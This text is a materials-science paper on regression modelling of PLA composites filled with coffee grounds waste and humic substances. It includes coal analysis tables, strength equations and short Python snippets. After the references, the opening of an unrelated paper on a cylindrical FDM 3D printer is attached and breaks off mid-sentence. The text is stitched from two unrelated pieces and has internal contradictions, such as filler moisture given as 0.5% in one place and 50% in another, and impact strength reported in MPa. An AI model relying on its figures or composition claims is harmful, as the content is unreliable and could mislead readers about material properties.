Abstract. The purpose of the article is to research the chemical composition of hybrid eco-friendly biodegradable filled composites by the computer modeling method. The tasks of the research are to form a data array for various polymer composite systems based on polylactic acid, coffee grounds waste and humic substances in terms of their level of impact strength and breaking stress during bending at various chemical compositions, the formation of experimental-statistical mathematical models of the chemical composition of hybrid eco-friendly biodegradable filled composites, and the processing of the resulting mathematical models in the MathCad Prime 6.0 environment in order to predict the most important strength characteristics of hybrid eco-friendly biodegradable filled composites. The design of experimental-statistical mathematical models in the form of regression equations was done with the help of the computer program STATISTICA. Processing of the mathematical models was performed in MathCad Prime 6.0. As a result of the research, models for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on their chemical composition, which can be adapted to any content of coffee grounds waste and humic substances, were built.

Keywords: Computer modeling · Chemical composition · Hybrid · Biodegradable · Composites
1 Introduction

Over the last 10 years, the prevailing world trend has been the use of environmentally friendly biodegradable polymer materials [1]. According to the production method, environmentally friendly biodegradable polymer materials can be [2, 3]:

• polymers that are directly derived from plant or animal biomass (polysaccharides, proteins, lipids, etc.),
• polymers obtained by classical chemical synthesis from renewable monomers on a biological basis, such as polylactic acid (PLA),
• polymers obtained by natural or genetically modified microorganisms, such as polyhydroxyalkanoates (PHAs), polyhydroxybutyrates (PHBs), bacterial cellulose, xanthan, gellan, pullulan and others.

The use of such a large range of environmentally friendly biodegradable polymer matrices makes it possible to obtain polymer materials with sufficient gas insulation
and heat resistance, which can be processed into different products and parts for various industries [4]. That is why the world trend in various industries is the use of environmentally friendly polymer materials and compositions that do not have a negative impact on the environment and have better operational and aesthetic advantages compared with other materials. These include such properties as high strength and durability, light weight and wide possibilities in design, color scheme and other important aesthetic characteristics. A characteristic feature of the production of structures and products from environmentally friendly polymer materials is the task of optimizing their component composition and performance. In fact, almost always the high quality and durability of polymer products and structures are due to a combination of the correct choice of material and the choice of the most effective processing method. Based on the analysis of scientific and technological development in the area of designing and using environmentally friendly polymer materials, the task of developing a set of basic technological solutions for creating effective products from them, as well as new approaches to modeling technological processes and designing products using environmentally friendly polymer materials, is very relevant. One of the main approaches that ensure the fulfillment of this set of tasks is the transition to computer-aided design of products from environmentally friendly polymer materials. In such cases, it becomes possible to use complex models based on environmentally friendly polymer materials and to take into account the physical and chemical characteristics, the features and requirements of production processes, as well as the possible behavior of the material during the operation of wares made from them. Modeling of products made from environmentally friendly polymer materials cannot be carried out without understanding the areas of their application and predicting the prospects for use in specific products or functional systems. Thus, the design of products from polymer materials is a very difficult task in terms of creating new polymer materials, because it requires appropriate technological and design information for the developed wares, equipment for their manufacture, as well as various technological parameters for their processing. Thus, almost always the high quality and durability of polymer products and details are caused by a combination of the correct choice of material and the choice of the most effective method of its processing. A modern trend in the areas of production, use and disposal of polymer materials is eco-friendly biodegradable polymers and their compositions, which implement the principle of «zero waste» throughout the life cycle. One of the most effective polymers, which is most often used for the production of bioplastics, is the synthetic polyester PLA [1]. PLA relates to bioplastics of the natural production cycle, because it is obtained by fermentation of raw materials and waste from various crops rich in starch, such as corn, beets or wheat bran [2]. In fact, PLA implements the principle of «zero waste» and allows one to avoid any kind of competition between different industries, due to the fact that it is a bioplastic obtained from by-products of the agro-food industry.
However, along with the presence of a wide range of useful properties in comparison with the most widely used petrochemical plastics, PLA is characterized by low vapor and gas tightness [2, 3], which significantly limits its scope of application. To eliminate the above-mentioned disadvantages of PLA, different directions of its functional modification with other bioplastics or fillers of organic and inorganic nature are used. One of the most effective directions is to obtain PLA compositions filled with coffee waste. Today, there is a significant amount of research on
coffee grounds as a filler in polymer composite materials [4–9] and as a source of important ingredients such as oil, terpenes, caffeine and polyphenols [10, 11]. Herewith, traditional coffee bean disposal includes mainly compost and soil fertilizers [5], but recently its chemical composition, rich in dietary fiber, phenolic compounds and melanoidins [6], has aroused great interest in the food [7], cosmetics and pharmaceutical industries [12]. Unfortunately, these methods cannot be considered the most cost-effective, especially given the high availability of such wastes, which are estimated at around 2 billion tonnes per year [13]. Scientific articles [14, 15] also studied bioplastic polymer matrices filled with coffee grounds waste, but these works are more scientific than applied industrial in nature. Our previous works [16–18] established the high efficiency of the processes of obtaining eco-friendly biodegradable polymer composite materials based on PLA and coffee grounds waste, which are characterized by high strength characteristics and resistance to many aggressive environments. Further research on the development and study of hybrid eco-friendly biodegradable polymer composite materials based on PLA and coffee grounds waste with their combined functional hybrid modification with humic substances (HS) is very relevant: HS were studied in previous research as structuring agents in different types of biopolymers [19, 20] and [21] and allow the crystallization and strength of PLA compositions to be increased. That is why it is very useful to design and model effective chemical compositions of hybrid eco-friendly biodegradable polymer composite materials based on bioplastics, such as PLA, and coffee grounds waste with their compatible functional hybrid modification with HS in order to achieve an optimal set of operational properties in such biodegradable polymer composite materials. The purpose of the article is to research the chemical composition of hybrid eco-friendly biodegradable filled composites by the computer modeling method. The tasks of the research are:

• formation of a data array for various polymer composite systems PLA-HS and PLA-HS-coffee grounds waste regarding their level of impact strength and breaking stress during bending at different chemical compositions;
• formation of experimental and statistical mathematical models of the chemical composition of hybrid eco-friendly biodegradable filled composites;
• processing of the obtained mathematical models in the MathCad Prime 6.0 environment in order to predict the most important strength characteristics of hybrid eco-friendly biodegradable filled composites.
2 Materials and Methods

The objects of study were:

• a plastic blend of PLA Terramac TP-4000;
• coffee grounds waste, gathered in 8 different coffee shops in Kharkiv and dried to an instant moisture content of 0.5%. The coffee grounds waste has a polyfractional composition in the particle size range from 0.5 mm to 1 mm;
• HS, which were obtained by extraction of brown coal with an alkaline solution of sodium pyrophosphate, followed by extraction with 1% sodium hydroxide solution and precipitation with mineral acid. Indicators of the quality of the brown coal, which was used for obtaining HS, are given in Tables 1 and 2.
Table 1. Proximate analysis of brown coal*

Sample | W^a  | A^d  | S_t^d (S_t^daf) | V^daf (V^d)
1      | 16.8 | 48.7 | 2.08 (2.50)     | 56.7 (29.1)
2      | 8.1  | 8.3  | 1.72 (1.87)     | 47.7 (43.7)
3      | 30.6 | 36.7 | 2.78 (4.00)     | 63.0 (43.7)

*All values are in % mass. W^a – moisture content, %; A^d – ash content, %; S_t^d – content of sulfur, %; V^daf – volatile matter, %.

Table 2. Ultimate analysis of brown coal*

Sample | C^daf | H^daf | N^daf | S_t^daf | O_d^daf
1      | 80.83 | 4.48  | 1.29  | 2.50    | 10.90
2      | 68.10 | 4.57  | 1.35  | 1.87    | 24.11
3      | 60.71 | 4.87  | 1.30  | 4.00    | 29.12

*All values are in % mass. C^daf – content of carbon, %; H^daf – content of hydrogen, %; N^daf – content of nitrogen, %; O_d^daf – content of oxygen, %.
The essence of the method is to treat an analytical sample of fuel with an alkaline solution of sodium pyrophosphate, followed by extraction of the sample with a solution of sodium hydroxide, precipitation of humic acids with excess mineral acid and determination of the mass of the precipitate. The study of the impact strength and breaking stress during bending of the samples, without notching, at a temperature of 20 °C, was carried out on a pendulum impact tester according to ISO 180 and ISO 178, respectively. The design of experimental-statistical mathematical models in the form of regression equations was carried out using the computer program STATISTICA. Processing of the mathematical models was performed in MathCad Prime 6.0.
3 Experiments

Hybrid eco-friendly biodegradable composites were obtained by extruding pre-prepared raw materials in a single-screw laboratory extruder at a temperature of 170–200 °C and a screw rotation speed of 30–100 rpm. The L/D ratio of the extruder was 25, and, in order to increase the uniformity of the dispersed waste distribution in the final compositions, two passes were used to obtain the finished samples. 20 parallel experiments were carried out for each composition, and statistical processing was performed for such characteristics as the arithmetic mean, standard deviation and coefficient of variation.
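The statistical screening of the parallel tests reduces to three standard estimators. A minimal sketch follows, assuming the 20 measurements of one composition are given as a plain array; the example readings are hypothetical.

```python
import numpy as np

def summarize(measurements):
    """Arithmetic mean, standard deviation and coefficient of variation
    for the repeated tests of one composition."""
    m = np.asarray(measurements, dtype=float)
    mean = m.mean()
    std = m.std(ddof=1)           # sample standard deviation
    cv = 100.0 * std / mean       # coefficient of variation, %
    return mean, std, cv

# e.g. twenty impact-strength readings (hypothetical values)
mean, std, cv = summarize(np.random.normal(12.0, 0.8, size=20))
```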
4 Results

The initial stage of the experimental studies included the formation of a data array for various polymer composite systems PLA-HS and PLA-HS-coffee grounds waste in terms of their level of impact strength and breaking stress during bending; 20 parallel experiments were performed for each composition under study. In the first, PLA-HS, systems, the strength characteristics were studied at an HS content of 0.25, 0.5 and 0.75% mass. The effect of hybrid modification with HS on the strength properties of PLA is shown in Figs. 1 and 2. Due to the hybrid modification of PLA by HS there is an increase in strength properties; the increase in the impact strength and breaking stress during bending in the PLA-HS system with hybrid modification occurs in the order HS 3 > 2 > 1, and the optimal content of HS in the PLA-HS system is 0.5% mass. Therefore, the development of hybrid eco-friendly biodegradable filled composites based on PLA, HS and coffee grounds was carried out taking into account the finding that the optimal content of HS in PLA-HS systems is 0.5% mass.
Fig. 1. Graphic dependence of impact strength of PLA-HS systems on the content of different types of HS
Further, the PLA-HS-coffee grounds systems were studied at the optimal HS content of 0.5% mass and a variable content of coffee grounds waste of 20, 40 and 60% mass. Using IR spectroscopy methods, it has been shown [16, 17] that coffee grounds, in their chemical composition, are characterized by up to 6% or more content of caffeine, alkaloids and their companions, and up to 1% content of chlorogenic acids and their derivatives. The general appearance of the peak in the absorption range from 2900 cm−1 to 1800 cm−1 indicates the presence of water in the samples. For the coffee grounds this is the expected result, since during the drying process the water content was reduced only to 50%; besides, in the coffee grounds, as in any filler of
Fig. 2. Graphic dependence of breaking stress during bending of PLA-HS systems on the content of different types of HS
organic (vegetable) origin, the phenomenon of intramolecular liquid is also present. If the coffee grounds are not completely dried to the PLA, the available water prevents the thermal destruction of the coffee grounds, since it evaporates during heating and cools the mixture. This reduces the total temperature of mixture processing by extrusion. The temperature of the sample production is selected by the melting point of the polymer and the critical temperature for the coffee grounds. Thus, for the coffee grounds the temperature of self-ignition is 245 °C, the temperature of destruction beginning is 210 °C. The optimum processing temperature is the range t = 180–190 °C. The decrease in the intensity of the peak responsible for water in the composite material as compared to the coffee grounds indicates that the water is distorted during the heating process. The melting point of chlorogenic acid is 208 °C, so since the processing temperature of the composite material does not exceed 190 °C, it does not undergo exhaustion or destruction. Next, the optimal content of coffee grounds waste in hybrid eco-friendly biodegradable filled composites based on PLA, coffee grounds waste and HS in terms of achieving maximum physical and mechanical properties: impact strength and breaking stress during bending is shown in Fig. 3 and 4. Figure 3 shows that if we compare the dependence of impact strength of highly filled systems of hybrid PLA-HS-coffee grounds waste systems on the content of coffee grounds waste, there is a tendency for the value of the latter to increase with increasing the content of the filler. These data show an increase in impact strength for coffeefilled PLA-HS systems in 2.5 times for a sample with a content of coffee grounds waste 50% mass, which is predictable, because filled polymer materials always have a higher impact strength in comparison with homopolymers. The increase in the value of
Fig. 3. Graphic dependence of impact strength of PLA-HS-coffee grounds waste systems on the content of coffee grounds waste
Fig. 4. Graphic dependence of breaking stress during bending of PLA-HS-coffee grounds systems on the content of coffee grounds
breaking stress during bending (Fig. 4) also indicates the processability of hybrid eco-friendly biodegradable filled composites based on PLA, coffee grounds and HS. Thus, it becomes obvious that the coffee grounds are evenly distributed in the hybrid PLA-HS matrix [21]. At the same time, the filler even somewhat "softens" the original rather rigid PLA polymer. All this, together with the impact strength data, allows us to make assumptions about
the possibility of forming a variety of products from the composite material; herewith, the composition with a coffee content of 50% mass deserves special attention. It is also important to clarify that the increase in the complex of physical and mechanical properties of hybrid eco-friendly biodegradable filled composites based on PLA, coffee grounds waste and HS is associated with a decrease in the specific surface area from 5.1 m²/cm to 2.8 m²/cm, indicating that the introduction of coffee grounds waste increases the homogeneity of the hybrid PLA-HS-coffee grounds waste systems.
5 Discussion

The regression equations of the dependence of the strength properties of the PLA-HS and PLA-HS-coffee grounds waste systems on the main quality indicators of the brown coal, which was used for obtaining HS, were determined (Tables 3 and 4). The experimental-statistical mathematical model was developed in the form of a regression equation for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on the content of the dispersed phase in the form of coffee grounds waste and HS 3, as the most effective in terms of increasing the complex of strength properties (Table 5).

Table 3. The regression equations of the dependence of the strength properties of the PLA-HS systems on the main indicators of the quality of the brown coal, which was used for obtaining HS*

No. | Equation type                                     | R²   | R    | SE, MPa
1   | IS = 24.4301 − 0.1392 · C^daf + 5.4667 · HA       | 0.65 | 0.81 | 1.64
2   | IS = 11.6502 + 0.1427 · O_d^daf + 5.4667 · HA     | 0.62 | 0.79 | 1.69
3   | IS = 7.3746 + 0.1313 · V^daf + 5.4667 · HA        | 0.53 | 0.73 | 1.88
4   | BSDB = 193.2687 − 0.8391 · C^daf + 62.5333 · HA   | 0.72 | 0.85 | 13.70
5   | BSDB = 115.8122 + 0.8805 · O_d^daf + 62.5333 · HA | 0.71 | 0.84 | 13.84
6   | BSDB = 103.8457 + 0.5518 · V^daf + 62.5333 · HA   | 0.64 | 0.80 | 15.38

*IS – impact strength; BSDB – breaking stress during bending; HA – content of humic substances; R² – coefficient of determination; R – correlation coefficient; SE – standard error (R², R and SE constitute the statistical assessment).
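Regressions of the form used in Table 3 — an intercept, one coal-quality indicator and the HS content — can be reproduced with ordinary least squares. The sketch below is illustrative only: the response array is a random stand-in for the measured impact strengths, so the fitted coefficients will not match Table 3.

```python
import numpy as np

# Placeholder design: carbon content C_daf of the three coals repeated
# for the three HS dosage levels studied (0.25, 0.50, 0.75 % mass).
C_daf = np.array([80.83, 68.10, 60.71] * 3)
HA = np.array([0.25] * 3 + [0.50] * 3 + [0.75] * 3)
IS = np.random.normal(14.0, 1.5, size=9)       # stand-in for measurements

X = np.column_stack((np.ones_like(C_daf), C_daf, HA))
coef, residuals, rank, sv = np.linalg.lstsq(X, IS, rcond=None)
pred = X @ coef
r2 = 1.0 - np.sum((IS - pred) ** 2) / np.sum((IS - IS.mean()) ** 2)
print(coef, r2)   # compare with the signs and R2 reported in Table 3
```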
As a result of performing the regression analysis with the purpose of obtaining one mathematical model for both investigated strength characteristics, the coefficients k1–k10 in the regression equation (Table 5) were determined; these have different values depending on which indicator is the target for the hybrid eco-friendly biodegradable filled composites: impact strength or breaking stress during bending. The created mathematical model in the form of a regression equation (Table 5) was also implemented in MathCad Prime 6.0. For this model, theoretical calculations of the predicted values of impact strength and breaking stress during bending were carried out, which are presented in the form of three-dimensional graphics for forecasting the performance properties of hybrid eco-friendly
Table 4. The regression equations of the dependence of the strength properties of PLA-HS-coffee grounds waste systems on the main indicators of the quality of the brown coal, which was used for obtaining HS, and the content of coffee grounds waste*

No. | Equation type                                    | R²   | R    | SE, MPa
7   | IS = 47.1167 − 0.3513 · C^daf + 0.1917 · CG      | 0.31 | 0.56 | 9.13
8   | IS = 14.8180 + 0.3625 · O_d^daf + 0.1917 · CG    | 0.28 | 0.53 | 9.18
9   | IS = 5.6861 + 0.3025 · V^daf + 0.1917 · CG       | 0.25 | 0.50 | 9.48
10  | BSDB = 448.2729 − 3.6454 · C^daf + 4.5502 · CG   | 0.80 | 0.90 | 62.00
11  | BSDB = 112.8920 + 3.7724 · O_d^daf + 4.5502 · CG | 0.80 | 0.90 | 62.82
12  | BSDB = 25.7944 + 3.0061 · V^daf + 4.5502 · CG    | 0.76 | 0.87 | 67.77

*CG – content of coffee grounds waste.
biodegradable filled composites depending on the content of the dispersed phase in the form of coffee grounds waste and HS 3, as the most effective in terms of increasing the complex of strength properties (Figs. 5 and 6). As a result of the obtained surfaces, it becomes possible, according to the most important target indicator of the strength of hybrid eco-friendly biodegradable filled composites in the form of impact strength or breaking stress during bending, to determine their optimized composition, which will also ensure a sufficient level of manufacturability in terms of the ability to be processed by a wide range of methods: injection molding, extrusion, etc.

Table 5. The regression equations for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites*

Regression coefficients | IS, MPa       | BSDB, MPa
k1                      | 0.1572        | 0.0337
k2                      | 4.340         | 0.7547
k3                      | −37.341       | −10.258
k4                      | 215.84        | −2.040
k5                      | −5.448        | 0.9076
k6                      | 0.0436        | −0.0107
k7                      | 126.57        | −193.74
k8                      | −10.045       | 9.623
k9                      | 0.250         | −0.1323
k10                     | −1.862 · 10⁻³ | 5.8535 · 10⁻⁴

Statistical assessment:
R²                      | 0.90          | 0.91
R                       | 0.95          | 0.96
SE, MPa                 | 6.34          | 40.67

Equation type: IS(BSDB) = k1 · CG · HA² + k2 · CG³ + k3 · HA² + k4 · HA + k5 · CG · HA + k6 · CG² · HA + k7 + k8 · CG + k9 · CG² + k10 · HA³
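The fitted model of Table 5 is just a polynomial in the two contents and is straightforward to reuse. A sketch follows, with the coefficients copied from the IS column as printed; if any exponents were lost in typesetting, they would carry over, so treat the numerical output as illustrative.

```python
# Coefficients as printed in Table 5 (column IS, MPa).
K_IS = dict(k1=0.1572, k2=4.340, k3=-37.341, k4=215.84, k5=-5.448,
            k6=0.0436, k7=126.57, k8=-10.045, k9=0.250, k10=-1.862e-3)

def predict(cg, ha, k):
    """Evaluate the regression polynomial of Table 5 at a composition
    with cg % mass coffee grounds waste and ha % mass humic substances."""
    return (k["k1"] * cg * ha**2 + k["k2"] * cg**3 + k["k3"] * ha**2
            + k["k4"] * ha + k["k5"] * cg * ha + k["k6"] * cg**2 * ha
            + k["k7"] + k["k8"] * cg + k["k9"] * cg**2 + k["k10"] * ha**3)

# candidate composition highlighted in the text: 50 % mass CG, 0.5 % mass HS
print(predict(50.0, 0.5, K_IS))
```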
Fig. 5. 3D graphic for forecasting breaking stress during bending of hybrid eco-friendly biodegradable filled composites
Forecasting studies have been carried out to determine the most effective structure of new environmentally friendly polymer materials on the basis of PLA, HS and coffee waste. The possibility of forming various products from the composite material is shown, and a composition with a coffee grounds waste content of 50% mass
Fig. 6. 3D graphic for forecasting impact strength of hybrid eco-friendly biodegradable filled composites
deserves special attention. The increase in breaking stress during bending also indicates the manufacturability of the new polymer composite material. Thus, it becomes evident that the coffee grounds waste is evenly distributed in the PLA matrix. In addition, it even slightly "softens" the original rather rigid PLA polymer. All this, together with the impact strength, suggests the possibility of forming various products from the composite material, while the composition with a coffee grounds waste content of 50% mass deserves particular attention. The modeling allows us to obtain models for forecasting the performance of hybrid eco-friendly biodegradable filled composites depending on their chemical composition, which can be adapted to any content of coffee grounds waste and HS.
6 Conclusions

As a result of the research, computer modeling of the chemical composition of hybrid eco-friendly biodegradable filled composites was performed. The optimal chemical composition of hybrid eco-friendly biodegradable filled composites based on PLA-HS-coffee grounds waste was determined. The scientific novelty of the study lies in the fact that, based on systematic experimental research of the relationship between the chemical composition of composite systems based on PLA, humic substances and coffee grounds waste and their properties, an adequate mathematical model for predicting the strength characteristics of hybrid eco-friendly biodegradable filled composites was created. The possibility of forming various products from the composite material is shown, and a composition with a coffee grounds waste content of 50% mass and an HS content over 0.5% mass deserves special attention. Computer models for forecasting the most important
performance characteristics of this composite were built. As a result of the research, which was carried out in MathCad Prime 6.0, 3D charts for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on their chemical composition were built; they can be adapted to any content of coffee grounds waste and HS. Further research can be aimed at choosing the most suitable areas of application of the designed hybrid eco-friendly biodegradable filled composites based on the prediction of a complex of their strength properties according to the models obtained in this work.
References 1. Tawakkal, I.S.M.A., Cran, M.J., Miltz, J., Bigger, S.W.: A review of poly(lactic acid)-based materials for antimicrobial packaging. J. Food Sci. 79(8), 1477–1490 (2014). https://doi.org/10.1111/1750-3841.12534 2. Jamshidian, M., Tehrany, E.A., Imran, M., Jacquot, M., Desobry, S.: Poly-lactic acid: production, applications, nanocomposites, and release studies. Compr. Rev. Food Sci. Food Saf. 9(5), 552–571 (2010). https://doi.org/10.1111/j.1541-4337.2010.00126 3. Rebocho, A.T., et al.: Production of medium-chain length polyhydroxyalkanoates by Pseudomonas citronellolis grown in apple pulp waste. Appl. Food Biotechnol. 6(1), 71–82 (2019). https://doi.org/10.22037/afb.v6i1.21793 4. Siriwong, C., Boopasiri, S., Jantarapibun, V., Kongsook, B., Pattanawanidchai, S., Sae-Oui, P.: Properties of natural rubber filled with untreated and treated spent coffee grounds. J. Appl. Polym. Sci. 135(13), 46060 (2018). https://doi.org/10.1002/app.46060 5. Essabir, H., Raji, M., Laaziz, S.A., Rodrique, D., Bouhfid, R., Qaiss, A.: Thermo-mechanical performances of polypropylene biocomposites based on untreated, treated and compatibilized spent coffee grounds. Compos. B Eng. 149, 1–11 (2018). https://doi.org/10.1016/j.compositesb.2018.05.020 6. Moustafa, H., Guizani, C., Dupont, C., Martin, V., Jeguirim, M., Dufresne, A.: Utilization of torrefied coffee grounds as reinforcing agent to produce high-quality biodegradable PBAT composites for food packaging applications. ACS Sustain. Chem. Eng. 5(2), 1906–1916 (2017). https://doi.org/10.1021/acssuschemeng.6b02633 7. Lee, H.K., Park, Y.G., Jeong, T., Song, Y.S.: Green nanocomposites filled with spent coffee grounds. J. Appl. Polym. Sci. 132(23), 42043 (2015). https://doi.org/10.1002/app.42043 8. Wu, H., et al.: Effect of oil extraction on properties of spent coffee ground–plastic composites. J. Mater. Sci. 51(22), 10205–10214 (2016). https://doi.org/10.1007/s10853-016-0248-2 9. Zarrinbakhsh, N., Wang, T., Rodriguez-Uribe, A., Misra, M., Mohanty, A.K.: Characterization of wastes and coproducts from the coffee industry for composite material production. BioResources 11(3), 7637–7653 (2016). https://doi.org/10.15376/biores.11.3.7637-7653 10. Campos-Vega, R., Loarca-Piña, G., Vergara-Castañeda, H.A., Oomah, B.D.: Spent coffee grounds: a review on current research and future prospects. Trends Food Sci. Technol. 45(1), 24–36 (2015). https://doi.org/10.1016/j.tifs.2015.04.012 11. Esquivel, P., Jiménez, V.M.: Functional properties of coffee and coffee by-products. Food Res. Int. 46(2), 488–495 (2012). https://doi.org/10.1016/j.foodres.2011.05.028 12. Bessada, S.M.F., Alves, R.C., Oliveira, M.B.P.P.: Coffee silverskin: a review on potential cosmetic applications. Cosmetics 5(1), 5 (2018). https://doi.org/10.3390/cosmetics5010005 13. Bessada, S.M.F., Alves, R.C., Costa, A.S.G., Nunes, M.A., Oliveira, M.B.P.P.: Coffea canephora silverskin from different geographical origins: a comparative study. Sci. Total Environ. 645, 1021–1028 (2018). https://doi.org/10.1016/j.scitotenv.2018.07.201
14. Cruz, M.V., et al.: Production of polyhydroxyalkanoates from spent coffee grounds oil obtained by supercritical fluid extraction technology. Biores. Technol. 157, 360–363 (2014). https://doi.org/10.1016/j.biortech.2014.02.013 15. Obruca, S., Benesova, P., Petrik, S., Oborna, J., Prikryl, R., Marova, I.: Production of polyhydroxyalkanoates using hydrolysate of spent coffee grounds. Process Biochem. 49(9), 1409–1414 (2014). https://doi.org/10.1016/j.procbio.2014.05.013 16. Lebedev, V., Tykhomyrova, T., Litvinenko, I., Avina, S., Saimbetova, Z.: Design and research of eco-friendly polymer composites. Mater. Sci. Forum 1006, 259–266 (2020). https://doi.org/10.4028/www.scientific.net/MSF.1006.259 17. Lebedev, V., Tykhomyrova, T., Filenko, O., Cherkashina, A., Lytvynenko, O.: Sorption resistance studying of environmentally friendly polymeric materials in different liquid mediums. Mater. Sci. Forum 1038, 168–174 (2021). https://doi.org/10.4028/www.scientific.net/MSF.1038.168 18. Lebedev, V., Tykhomyrova, T., Lytvynenko, O., Grekova, A., Avina, S.: Sorption characteristics studies of eco-friendly polymer composites. In: E3S Web of Conferences, vol. 280, p. 11001 (2021). https://doi.org/10.1051/e3sconf/202128011001 19. Lebedev, V., Miroshnichenko, D., Xiaobin, Z., Pyshyev, S., Savchenko, D.: Use of humic acids from low-grade metamorphism coal for the modification of biofilms based on polyvinyl alcohol. Pet. Coal 63(3), 646–654 (2021) 20. Lebedev, V., Miroshnichenko, D., Xiaobin, Z., Pyshyev, S., Savchenko, D., Nikolaichuk, Y.: Use of humic acids from low-grade metamorphism coal for the modification of biofilms based on polyvinyl alcohol. Pet. Coal 63(4), 953–962 (2021) 21. Xu, X., Zhen, W.: Preparation, performance and non-isothermal crystallization kinetics of poly(lactic acid)/amidated humic acid composites. Polym. Bull. 75(8), 3753–3780 (2017). https://doi.org/10.1007/s00289-017-2233-6
A New FDM Printer Concept for Printing Cylindrical Workpieces Alexandr Salenko1(B) , Anton Kostenko1 , Daniil Tsurkan1 , Andryi Zinchuk1 , Mykhaylo Zagirnyak2 , Vadim Orel2 , Roman Arhat2 , Igor Derevianko3 , and Aleksandr Samusenko3 1 I. Sikorskyi NTUU KPI, Kyiv, Ukraine
[email protected] 2 Kremenchuk Mykhailo Ostrohradskyi National University, Kremenchuk, Ukraine 3 DB “Pivdenne”, Dnipro, Ukraine
Abstract. Printer layouts for the FDM process are analyzed and systematized. It is shown that the use of fundamentally new approaches, which involve changing the shape of the base and the type of movement, in particular, replacing the traditional table with a rotating cylindrical one, allows better printing of products in the form of thin cylindrical shells. First of all, this concerns the strength parameters of the obtained products. A comparison of the tensile strength of test specimens obtained by FDM processes on two printers, one of which is made according to the proposed concept, proves that the latter can be successfully used for the manufacture of axisymmetric tank housings with axial holes, providing a tensile strength of 0.75…0.85 [σ] of the filament material against 0.45…0.55 [σ] when using printers of conventional layout. The density of the plastic (as well as the accuracy of the form) is determined by the dynamic processes in the printer, which requires analysis and modeling of the behavior of the printer's mechanical system. It is proved that the dynamic phenomena of acceleration and deceleration of rotating and linearly moving masses have a greater impact on density and accuracy compared with traditional devices, which requires the introduction of special algorithms for controlling the drives in transient modes.

Keywords: FDM printing · cylindrical blanks · FDM quality · non-flatbed printing · mechanical system modeling
1 Introduction

Methods of additive synthesis of prototypes, models and structural elements are currently among the most promising in shaping, as they can be directly applied to so-called "smart production", aimed at obtaining fundamentally new products, materials and workpieces with minimal use of raw materials and maximum unification of the equipment. Even though today researchers around the world are actively searching for areas of use of additive technologies [1, 2] and studying the peculiarities of the formation of layers [3–5] and of the product as a whole [6–8], these technologies are still poorly researched. However, the prospects for production are so wide that they encourage scientists to intensify
their efforts in this area, discovering methods, techniques, and materials for the effective industrial application of these technologies. Thus, today additive processes have already gone beyond the limits of traditional application and are being actively introduced in construction and architecture [9, 10], biomedicine [11, 12], and chemistry. However, in all aspects of the technologies used, the "building up" of the object from the base (in the form of a plane – a flat table, foundation, substrate) remains unchanged. The main methods of additive production in accordance with [2] are given in Table 1. Among the listed methods, FDM processes are the simplest and most promising in terms of minimum costs and maximum quality [13]. The working body (head) must perform various movements, forming a layered product [4, 14]. Different principles of positioning the head (or the table with the model) are applied:

• movement in the Cartesian coordinate system, when the design includes three mutually perpendicular guides, along each of which either the print head or the base of the model moves;
• by means of three parallelograms, when three radially, symmetrically located motors coordinately shift the bases of three parallelograms attached to the print head;
• autonomous positioning, when the print head is placed on its own chassis, and this structure moves entirely due to a drive that propels the chassis [15];
• a 3D printer with a rotating table, where one or more axes of rotation are used instead of linear movement.

Currently, there are two main methods of extruder positioning: moving orthogonal guides that coincide with the Cartesian coordinates of the head position, and moving vertical linear coordinates that require recalculation of the Cartesian coordinates for the so-called delta mechanism (a mechanism with angular bars). The so-called KOSSEL is a representative of the latter. The most well-known and developed printer that implements the first principle is the PRUSA printer (or printers based on PRUSA – for example, PrintrBot). The Makerbot project (or its analogue, the Wanhao Duplicator) is another successful commercial project, with a vertically moving table. The options for implementing the manipulating printer system are discussed in detail in paper [7]. The authors have provided a detailed description of the manipulation systems used to carry out the operating movements, and identified manufacturers that market certain design solutions for printers. All printers and modifications of manipulation systems use a layer-by-layer scheme of spreading layers of material, with reproduction of the set model from a flat platform. In this case, the model (product) A is conditionally intersected by many surfaces si parallel to the desktop XOY, each of which is one step δz away from the other; the step is determined by the nozzle used (diameter ds), the filament diameter Df, and the laying rate vs (Fig. 1). Other parameters of the printing process are the temperature of the base (table) Ts, the temperature in the extruder Tr, as well as the distance δ between the table and the adhesion surface. Due to such spreading of the layers, a set of indicators of the finished product is formed, in particular, its accuracy (reproduced along the basis vectors x, y, z), strength (σx, σy, σz), etc. At the same time, a number of researchers who pay attention exclusively to the accuracy of shape reproduction [16, 17], surface quality [18], and deformability of
Table 1. The methods of additive synthesis

Type | Technology | Printing with several materials | Color printing | Description
Extrusion | Fused Deposition Modeling, FDM | + | + | Hardening of the material during cooling – the print head squeezes a drop of heated thermoplastic onto the cooled platform-base. The droplets quickly solidify and stick together, forming layers of the future object
Extrusion | Robocasting, Direct Ink Writing, DIW | + | + | "Ink" (usually a ceramic slurry) comes out of the nozzle in a liquid state, but immediately takes the desired shape because it is a pseudo-plastic liquid
Photopolymerization | Laser Stereolithography, SLA | − | − | An ultraviolet laser illuminates the liquid photopolymer (through a photo template, or gradually, pixel by pixel)
Photopolymerization | SLA-DLP | − | − | A DLP projector illuminates the photopolymer
Forming a layer on an even layer of powder | 3D-Printing, 3DP | − | − | Bonding the powder by applying liquid glue by inkjet printing
Forming a layer on an even layer of powder | Electron-beam melting, EBM | − | − | Melting of metal powder by an electron beam in vacuum
Forming a layer on an even layer of powder | Selective laser sintering, SLS | − | − | Melting of the powder under the action of laser radiation
Forming a layer on an even layer of powder | Direct metal laser sintering, DMLS | − | − | Melting of metal powder under the action of laser radiation
Forming a layer on an even layer of powder | Selective heat sintering, SHS | − | − | Melting of the powder by a heating head
Supply of material in the form of a wire | Electron Beam Freeform Fabrication, EBF | + | + | Melting of the supplied wire material under the action of an electron beam
Lamination | Laminated Object Manufacturing, LOM | + | + | The part is made from a large number of layers of working material, which are gradually superimposed on each other and glued together, while a laser (or cutting tool) cuts the contour of the section of the future part in each layer
Point supply of powder | Directed Energy Deposition | + | + | The supplied powder melts under the action of a laser or electron beam
Inkjet printing | Multi Jet Modeling, MJM | + | + | The working material is applied by inkjet printing
finished products after the process [19] have noted that these parameters are determined by both the extrusion modes and the scheme of spreading the polymer melt. The same applies to another important issue – the problem of the strength of products and the possibility of using printed parts in structures and mechanisms [20]. We have already noted in [21]
Fig. 1. The scheme of the formation of product A by FDM-printing
